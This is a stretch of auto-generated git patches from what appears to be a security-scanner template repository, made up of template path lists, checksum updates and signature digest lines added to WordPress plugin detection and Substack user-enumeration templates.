'http/cves/2024/CVE-2024-4295.yaml' - - 'http/cves/2024/CVE-2024-4879.yaml' - - 'http/cves/2024/CVE-2024-4885.yaml' - - 'http/cves/2024/CVE-2024-5217.yaml' - - 'http/cves/2024/CVE-2024-5315.yaml' - - 'http/cves/2024/CVE-2024-6289.yaml' - - 'http/cves/2024/CVE-2024-6587.yaml' - - 'http/cves/2024/CVE-2024-6646.yaml' - - 'http/default-logins/deluge/deluge-default-login.yaml' - - 'http/default-logins/gitblit/gitblit-default-login.yaml' - - 'http/default-logins/netflow/netflow-default-login.yaml' - - 'http/exposed-panels/adguard-panel.yaml' - - 'http/exposed-panels/falcosidekick-panel.yaml' - - 'http/exposed-panels/freshrss-panel.yaml' - - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' - - 'http/exposed-panels/hal-management-panel.yaml' - - 'http/exposed-panels/netflow-analyzer-panel.yaml' - - 'http/exposed-panels/tomcat/tomcat-exposed.yaml' - - 'http/exposures/configs/apache-ozone-conf.yaml' - - 'http/exposures/configs/snoop-servlet-exposure.yaml' - - 'http/exposures/files/adcs-certificate.yaml' - - 'http/misconfiguration/freshrss-unauth.yaml' - - 'http/misconfiguration/installer/adguard-installer.yaml' - - 'http/misconfiguration/installer/freshrss-installer.yaml' - - 'http/misconfiguration/mongod-exposure.yaml' - - 'http/misconfiguration/servicenow-title-injection.yaml' - - 'http/misconfiguration/sftpgo-admin-setup.yaml' - - 'http/misconfiguration/ssrpm-arbitrary-password-reset.yaml' - - 'http/technologies/apache/apache-gravitino-detect.yaml' - - 'http/technologies/apache/apache-ozone-detect.yaml' - - 'http/technologies/wordpress/plugins/fluent-smtp.yaml' - - 'http/technologies/wordpress/plugins/wp-crontrol.yaml' - - 'http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml' - - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' - - 'http/vulnerabilities/other/jan-file-upload.yaml' - - 'http/vulnerabilities/other/lvs-download-lfi.yaml' - - 'http/vulnerabilities/other/ncast-lfi.yaml' - - 'http/vulnerabilities/other/wifisky7-rce.yaml' - - 'network/c2/7777botnet.yaml' - - 'network/cves/2024/CVE-2024-6746.yaml' - - 'vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml' - - 'workflows/nacos-workflow.yaml' + - 'http/osint/user-enumeration/substack.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 76b9b075a79959a3b462927c740729ef6d29a0e6 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Jul 2024 13:03:54 +0000 Subject: [PATCH 1679/1841] Auto Generated Templates Checksum [Fri Jul 26 13:03:54 UTC 2024] :robot: --- templates-checksum.txt | 30 +++++++++++++++--------------- 1 file changed, 15 insertions(+), 15 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e12f9b67ff..c86b130c87 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1578,7 +1578,7 @@ http/cves/2018/CVE-2018-16979.yaml:ac6f5cfd3090ba52cea4db62eb8719cbff2b0558 http/cves/2018/CVE-2018-17153.yaml:5cdbe44c616d3ea36184bee2460031b569d362a0 http/cves/2018/CVE-2018-17246.yaml:fe7a3e41ef31e8f761f3df652a564aae3997bbd6 http/cves/2018/CVE-2018-17254.yaml:63a99c6884bcb88c9d81a6d95136c007f8296cf6 -http/cves/2018/CVE-2018-17422.yaml:ee0c028b7a6bbd7f0ad9492826df1e11cfc3a9b2 +http/cves/2018/CVE-2018-17422.yaml:6cb4f7c9b64f7ef4e45110285d7a81076550d35b http/cves/2018/CVE-2018-17431.yaml:4f724c2ec11d7e5574b913c8f3d171dc69bf23d6 http/cves/2018/CVE-2018-18069.yaml:fb55c1c8a6544261d3da494f50ffe75d12262d5c http/cves/2018/CVE-2018-18264.yaml:22473d7c73a3bf92f029d8f0c97bd438247b7fec @@ -1858,7 +1858,7 @@ http/cves/2020/CVE-2020-12478.yaml:6f8ebabd8a4a0df0eaaf7ebb99dbb706121d2418 http/cves/2020/CVE-2020-12720.yaml:60582b2b99d2498df400db358a628940fc8ced02 http/cves/2020/CVE-2020-12800.yaml:571e8c8b17acd08b60d0b8f28a12c6589caa253c http/cves/2020/CVE-2020-13117.yaml:115011fc3689582aab5176d3b93c0353c5f68a58 -http/cves/2020/CVE-2020-13121.yaml:93e5a3ab99c0ba9e334c2e082b4d38fb250b69ac +http/cves/2020/CVE-2020-13121.yaml:cf9bf86ed2ce0b6145b88f46c989b2548dca569e http/cves/2020/CVE-2020-13158.yaml:e519e5f44d47a168e7e54bd2a643040f87a12587 http/cves/2020/CVE-2020-13167.yaml:ec08b3533526649fedf57311f268a9ffe02111c0 http/cves/2020/CVE-2020-13258.yaml:4c4cb4659c8f357321d694522d65826a3acf4bd1 @@ -2586,7 +2586,7 @@ http/cves/2022/CVE-2022-0788.yaml:5d60f92d349f7fecefec325a40f08d6970a98a99 http/cves/2022/CVE-2022-0814.yaml:b9d91c9b6d0d5785a892ae9e0b8ca7ebbb0f2dbf http/cves/2022/CVE-2022-0817.yaml:3d97d0fc13055df8d7452acbf7103cbed7eb24cc http/cves/2022/CVE-2022-0824.yaml:0c81c3a3ec7279bb619a1e0ddc46dd2fe2463ad7 -http/cves/2022/CVE-2022-0826.yaml:89bc081100825cb559a3d8e4864166d9be637ffb +http/cves/2022/CVE-2022-0826.yaml:62452246f330773b5332e97e94f8bacfcdaf7f17 http/cves/2022/CVE-2022-0827.yaml:0004c15fb0ac347037597f5d71d7800cf097e84a http/cves/2022/CVE-2022-0846.yaml:19baadca475a5807aaafef134a6e7399ab75ec51 http/cves/2022/CVE-2022-0864.yaml:f2dfdb584ab501f690ba9ef1aee6ecc88f0ae7f7 @@ -2615,7 +2615,7 @@ http/cves/2022/CVE-2022-1168.yaml:93e0ac42cd3ee8391d615a78f9eac80ae749aa8f http/cves/2022/CVE-2022-1170.yaml:fc73692aa6bf3c88cfac42e379be21e45c14b392 http/cves/2022/CVE-2022-1221.yaml:d4c46be1641ebeef015e219a3d6bfd4ab55ce8f0 http/cves/2022/CVE-2022-1329.yaml:91ffe6a2f0b02dff11a43ae18576f2744a9d0fb1 -http/cves/2022/CVE-2022-1386.yaml:0b6950f34662ba056fe941a77976acb81d987932 +http/cves/2022/CVE-2022-1386.yaml:49d6d50af97dddeb644e0d44c4fd786068b0b863 http/cves/2022/CVE-2022-1388.yaml:ec9ff508d8aa2af48234933c0ec747582268ac04 http/cves/2022/CVE-2022-1390.yaml:cdda5e7620a740024ec05c775b94861e6885853a http/cves/2022/CVE-2022-1391.yaml:d8fe08b47cb867425b80fa614e64f8b211ff609e @@ -2767,7 +2767,7 @@ http/cves/2022/CVE-2022-29009.yaml:5b59e01a1574bdcf05aee421722002bfeedc1eaf http/cves/2022/CVE-2022-29013.yaml:aa822f0d3d9c552b38ee8e0d6f24416d6fc52cca http/cves/2022/CVE-2022-29014.yaml:d7fe9eba13214850635cedd9df08b509ed93f30c http/cves/2022/CVE-2022-29078.yaml:0d9401a7ca4b569db1fa80884acc0201e4534493 -http/cves/2022/CVE-2022-29153.yaml:8deb5eed1e575971e430b1cb309e7c2c74a650e8 +http/cves/2022/CVE-2022-29153.yaml:37c7c4cf25e53acad5036c798b11df54752b8a75 http/cves/2022/CVE-2022-29272.yaml:0b04cec71a246d42c7cfd03d2e2146265691e3de http/cves/2022/CVE-2022-29298.yaml:dbb673cf30a552d25f26c4dfc4517001f5a6e919 http/cves/2022/CVE-2022-29299.yaml:1ca6e99d21f0cab9e13d0b8dd036d3a0c4870b06 @@ -2869,7 +2869,7 @@ http/cves/2022/CVE-2022-37191.yaml:0c57a701c1c9067c702ef5d40ca23448a58f6709 http/cves/2022/CVE-2022-37299.yaml:0a3f30c80ce167733cb1a4432f2090d7d8715a62 http/cves/2022/CVE-2022-3768.yaml:8c9f9736507f827359a08f4f70e83cfa05cd3e2a http/cves/2022/CVE-2022-3800.yaml:a700c9264ffbedb46a2f3a22ec7e98be500097c5 -http/cves/2022/CVE-2022-38131.yaml:49cadbb0bb2d72895fe3281f98c67e1332d50025 +http/cves/2022/CVE-2022-38131.yaml:a5c2f2aefcf564ac3a91c575c845e251d74cca4c http/cves/2022/CVE-2022-38295.yaml:e935234c93f236f44ebedc6ec81801116b26d54b http/cves/2022/CVE-2022-38296.yaml:236c15b302eedb112d21bc64a388b0d716416755 http/cves/2022/CVE-2022-38322.yaml:a6dc529af3f38c615a3523546602018f81a14ed8 @@ -3066,7 +3066,7 @@ http/cves/2023/CVE-2023-23491.yaml:30046ed227b359bae6f8e485f89933d9955612da http/cves/2023/CVE-2023-23492.yaml:16fa0c1fc4002b952a33b61d3fabc64636ac7f23 http/cves/2023/CVE-2023-2356.yaml:83f12f25896993aaa17f815a0e62f12e24370a94 http/cves/2023/CVE-2023-23752.yaml:9d9d7f45b50837196c39fda7a218d094a42af504 -http/cves/2023/CVE-2023-24044.yaml:4482941e2ad063a7e77d1cea8eb9a12716b2b959 +http/cves/2023/CVE-2023-24044.yaml:753635d5e77735d797f39a02dbf1d29f82c3738b http/cves/2023/CVE-2023-24243.yaml:d8114d7e2422b334f5ac940ecd66811783da758c http/cves/2023/CVE-2023-24278.yaml:1d2306f9d9cb2d17f8e79ee9cac52005c5a55cfe http/cves/2023/CVE-2023-24322.yaml:2fd2be84af2595799fe334bc21a1d270f1c96ba2 @@ -3177,7 +3177,7 @@ http/cves/2023/CVE-2023-34020.yaml:8099d3e12f8a10e2d96d8bd1dc9161f04f821fb1 http/cves/2023/CVE-2023-34124.yaml:73042d74ae02e14a69bbc74952d41b3dc4aacc5e http/cves/2023/CVE-2023-34192.yaml:d0455d9800bb265d0a14eba0bacef50a7d87a37e http/cves/2023/CVE-2023-34259.yaml:29e00e6317898a17f5c645a1badf181d0b0644f9 -http/cves/2023/CVE-2023-34362.yaml:d477a1c3b81d3f95ec32840f9220c43d5de0ca13 +http/cves/2023/CVE-2023-34362.yaml:446814f5faf67a703db88c38de16a5fd7e5a5b55 http/cves/2023/CVE-2023-34537.yaml:0a82a06ab2f05e35b4cb238baff31f915ca7a864 http/cves/2023/CVE-2023-34598.yaml:0b38abd88b3fc2ac7790d931685f45cb92433619 http/cves/2023/CVE-2023-34599.yaml:0d749847fc42f3fc2a879d43fa3beecbd43b6091 @@ -4870,7 +4870,7 @@ http/exposures/backups/php-backup-files.yaml:2c05d22cc231014da2a5964eee452bf9670 http/exposures/backups/settings-php-files.yaml:c3ed4d0da82aebfc6767c6914a17674c995b4f11 http/exposures/backups/sql-dump.yaml:ead33d26fe70e2cd7a693b7106740ac4437a4fce http/exposures/backups/sql-server-dump.yaml:1d9af95edd46caa15f831d5d4673ecfd1282de99 -http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e +http/exposures/backups/zip-backup-files.yaml:02bab0fb9a7beaa1046a8e0c9a4d45d09a6c9d25 http/exposures/configs/accueil-wampserver.yaml:d33e2f3e0f198426999fff6bcd7d1344b5c46240 http/exposures/configs/airflow-configuration-exposure.yaml:b212acd4a5ef9cbb3e0b84da2b4a3cd8599aa1b3 http/exposures/configs/alibaba-canal-info-leak.yaml:9a0d928feb9c023e106d2e5fb6d4d6bab4e84297 @@ -7741,8 +7741,8 @@ http/token-spray/api-rijksmuseum.yaml:cf949998f89c97e55141311f423d78de4900e5da http/token-spray/api-savepage.yaml:7e8a127814b65eab3c3153e6ff5aa06041c9143f http/token-spray/api-scanii.yaml:aa0debaddc5e927def28b3a8c73a544810a89c2d http/token-spray/api-scraperapi.yaml:77729d0b7a3b3045a6231a768fb3ea54b0636693 -http/token-spray/api-scraperbox.yaml:8545b6365d4da5bda0872c24df251c536adf7435 -http/token-spray/api-scrapestack.yaml:7d30796084abc36542bc9fc41c0759a93a8b91de +http/token-spray/api-scraperbox.yaml:0a7657e0ac4bc53b88fb36a861b67831049be30b +http/token-spray/api-scrapestack.yaml:5bf86b2038203549460a6e2a94335e137cde42e0 http/token-spray/api-scrapingant.yaml:2d74b7431770cddf7706e57347e79dbb09e42598 http/token-spray/api-scrapingdog.yaml:36ec01b41847600aa7f9ed05803dd8f4512f78b7 http/token-spray/api-screenshotapi.yaml:23811c030da5191d10880ff1ca3702e804d51738 @@ -7785,7 +7785,7 @@ http/token-spray/api-weglot.yaml:7bff21ee8b7aa9fe011d50ffaf4b8e03c531da73 http/token-spray/api-wordcloud.yaml:74f33bece9584161d811fd58977d4be8a92d25e7 http/token-spray/api-wordnik.yaml:a7d77ed3156f4ebe4c7c16329afc8ca6c5f3059e http/token-spray/api-youtube.yaml:4aa93c7e149ba16f89cd95fb0ed95d53904b6cc0 -http/token-spray/api-zenrows.yaml:cdfc7edfa9a19d556420754efae4551330b8ff33 +http/token-spray/api-zenrows.yaml:7f083e728e4f02209b61a3c610cb865c990b4dc9 http/token-spray/api-zerbounce.yaml:f8791910350a1b497067ca416989c914f588d52e http/token-spray/api-zoomeye.yaml:1497726f625cb7f7ec99bb2d9da5740299054bf6 http/token-spray/google-autocomplete.yaml:83d7fc337042031cb3a7bd478cee07f3a40ebb19 @@ -8017,7 +8017,7 @@ http/vulnerabilities/other/bagisto-csti.yaml:dcc7c57c641a9a49e1e67ca561abce15742 http/vulnerabilities/other/bems-api-lfi.yaml:4b2ace615d63afc61e4401ca7c6d6bd3c7e0a02a http/vulnerabilities/other/beward-ipcamera-disclosure.yaml:4461c2309baf099cca67518def7863f003f459ac http/vulnerabilities/other/beyond-trust-xss.yaml:541a6f90d60f4267863346d5ebe9e1083f234f62 -http/vulnerabilities/other/bitrix-open-redirect.yaml:f0fb003e14a3893799500c36c284f19e51f69845 +http/vulnerabilities/other/bitrix-open-redirect.yaml:c07fd013b41f1696f544842d55c1ee758c520bd2 http/vulnerabilities/other/blue-ocean-excellence-lfi.yaml:77169388e9064f1e08de2505a00c6d01b999ac44 http/vulnerabilities/other/brightsign-dsdws-ssrf.yaml:366050c5044a7f40dd54529a409f4ef2a3aceff1 http/vulnerabilities/other/bullwark-momentum-lfi.yaml:4677beb1cf50189f15dddee0c2c36357df5f0c1a @@ -8707,7 +8707,7 @@ javascript/detection/ssh-auth-methods.yaml:c42ab280f2285a5cc2edcb75ba45bbebc0e01 javascript/enumeration/checkpoint-firewall-enum.yaml:8d7c249d110dbbe18e6dad9b67cb5f70d4fe5931 javascript/enumeration/ldap/ldap-metadata.yaml:02c4bddb6f9fc5cb5262f4f8cece729cf4fd6e95 javascript/enumeration/minecraft-enum.yaml:86520064cf23ae09b9ce6a2ec23f29abaeb9eb5e -javascript/enumeration/mysql/mysql-default-login.yaml:98658fc2b084689f2e82129fcbf36f7294e10570 +javascript/enumeration/mysql/mysql-default-login.yaml:274d4679cd8683407f4367b417db11384fece171 javascript/enumeration/mysql/mysql-info.yaml:c1042c0700cad92e7b3329fe3d64be9914186c66 javascript/enumeration/mysql/mysql-show-databases.yaml:4f95912ebfb4374efd5c35f8c7d778278e6cf60b javascript/enumeration/mysql/mysql-show-variables.yaml:51219ecb4e9b349371d5cf858b8b365392670d85 @@ -8930,7 +8930,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ce0147367966fefab24b30b1fb5725ff3a276604 +templates-checksum.txt:9be23860ca25b0dad4adcc986716695a5950c7fa vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From beeae441c94898bac0f1b5a8937ed5ad59decd13 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Jul 2024 13:04:02 +0000 Subject: [PATCH 1680/1841] Auto Template Signing [Fri Jul 26 13:04:02 UTC 2024] :robot: --- http/osint/user-enumeration/substack.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/osint/user-enumeration/substack.yaml b/http/osint/user-enumeration/substack.yaml index baf9eef9c7..9ef1deee44 100644 --- a/http/osint/user-enumeration/substack.yaml +++ b/http/osint/user-enumeration/substack.yaml @@ -32,3 +32,4 @@ http: part: body words: - 'handle\":\"{{user}}\"' +# digest: 4a0a004730450221009d54c04eeba3ade03ab2cb2ad1100aeb7347f5e0fa4296b04b4d5e1d6b14ebf6022025709641004cc0e27a721b83e08ff930e3182dd05236ab5a9e90e31ac46bc59a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..b2e08a74d6 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b1c68b8af98e014b2d4e14f04ba6fb5acdb406b596a77af0e42393355fc5d895022100db0bd681508d4d8d5195326707226b1ba929539a12de1480c1c68fc438a64bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 